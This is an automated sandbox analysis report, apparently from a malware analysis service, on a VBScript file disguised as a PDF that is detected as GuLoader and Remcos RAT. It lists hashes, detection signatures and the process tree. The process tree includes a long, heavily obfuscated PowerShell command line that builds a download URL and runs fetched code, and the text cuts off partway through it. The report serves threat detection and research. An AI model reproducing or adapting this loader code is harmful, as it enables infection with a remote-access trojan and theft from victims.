Edit tour
Windows
Analysis Report
A 413736796#U00b7pdf.vbs
Overview
General Information
Sample name: | A 413736796#U00b7pdf.vbsrenamed because original name is a hash value |
Original sample name: | A 413736796pdf.vbs |
Analysis ID: | 1523159 |
MD5: | 3f5e0a8b0d1ac0143d359bcb63171066 |
SHA1: | 7f6368b52a021340768f61ae047d88c7e6d4add3 |
SHA256: | 8da5ed79da8da8c5521a238f05bb61bd1e48c59fab0bee7758fc11c163142396 |
Tags: | vbsuser-abuse_ch |
Infos: | |
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7656 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\A 413 736796#U00 b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7756 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "<#Stagger s Eudoxian Basilikum mens Bonus point Tabs kontoers S kallesmkke ren #>;$Ly serde='Sho wery';<#Le nnoaceous reetableri ngen Retri everen Per sonificere nde Englad den Trklos et #>;$Par adoksal=$h ost.Privat eData;If ( $Paradoksa l) {$Verat rize++;}fu nction Omh ng120($Ser ranid){$De katerer=$S hockedness +$Serranid .Length-$V eratrize;f or( $Triph osphate=5; $Triphosph ate -lt $D ekaterer;$ Triphospha te+=6){$No osphere+=$ Serranid[$ Triphospha te];}$Noos phere;}fun ction Stun gen($Mermi thergate){ . ($P sychogram) ($Mermith ergate);}$ Attributvr dierne=Omh ng120 ' S apMTrougoK ncezStivn iGen.rlSem inlKysteaI n.an/ Apof 5Dr,je.Unr eh0 U op S ikk (Kimme WMarbliTil b,nBr.lldN onv.o Fo,g wFo hisGen m. Kv.lN L adiTIgang Ducat1Tor j0Roeku.Sc his0Mis t; C,odp None fW PaneiFu nkinTegne6 Bnk v4Drip p; Eth Cly wdxPerfo6 otto4Nomog ;Yuruj omp harCh.fsvC ykel:Unrev 1 al g2Mon ol1Dagbo.E rsta0Janic ) pole Hyp erG en,meM ini cHeate k AlmioHu. ge/U sty2S trat0C ntr 1Afko 0 U ig0ulsel1L r.om0 Un u 1 Tak Deta iFEf eriS, andrEnd.oe yltefP uk iorovsexDo pin/Anemo1 Os,el2di c o1St,rs.Fo rva0Tub r ';$Odelet= Omhng120 ' StenaUHomo pSInveseVa sofrA omv- Vejl,aRein tG Sti,eDv ornNAficiT Efter ';$E xaltations =Omhng120 '.ndechSv retMe,antM aoprpFeoff s Exp,: Ca ch/H ved/D eni dVel,f rBespiiAnt ifvDiesee, ncau.Af ta gIld uo op .aoSpildgP edomlUdrke eGabes. X muc S.rboV rdstmska.d /Vildsu Be stc Udho?C asime.ragi xStreep Su f.oPacifr Fedttacade =GroutdM n taoGho twF yrrenCulo lrenteo.er miaDoku d Rut & awah iHesped A li=Sytte1A quifZPseud dTalmayRes hvbNobblZL ygteYScala 4 onunW on arRowsnMUn .omwNonh.Y Fac.eKEgoc eb OutsuSv aleTUnderl irroGAl e bVprokuA s nusN h lit Slito9nert swOwlytX N r ehFreigq ImmollMe s iWPrizeSGl em BBimlec Spr n ';$C hristiansf eldere=Omh ng120 'Opt an>Rapso ' ;$Psychogr am=Omhng12 0 'Cantaib odee atyr xAsymp ';$ Nonexagger ation='Kas semangelen s238';$Ast rography=' \Sternman2 24.Ill';St ungen (Omh ng120 'A n de$Rainmg aledlNonex oForklbCou ntaPlettlB enzo:Padra IOpr ts.nt getBrandaM lersnVicek dParitsAdm intW.isttS tride Su l ng gardDel egeSedim= Dr,b$ Snrl eEntern ig urvKompl: Overa Sk l poverfpHin tidproklaE xuditLands aStikb+Sha rp$ inteAN onhysImita tReg orBry s oT ykkgU t ovr Unin aBescopT n nih ChoryA f ig ');St ungen (Omh ng120 ' rn d$ tab gM, tallPreoco CondubSemi ta Tilfl u rf:Sn ckSS ingeeTrico rFjerdiC,a ppaTricot SloseBulbi l Angryv d er=Lema $ AkadE lndf x TuscaHoo kslCobantP a deabulbi tJunioiNon unoBiblinE lectsUnde, . Rei,s Sc .epAdr nl ArguiMarvb tBeho,( Ce ph$ShrugCL eonohMetod r RecuiBor d sPlumatM arvei Berm aPylorn Ov ersOpmunfB ,rmeeKonf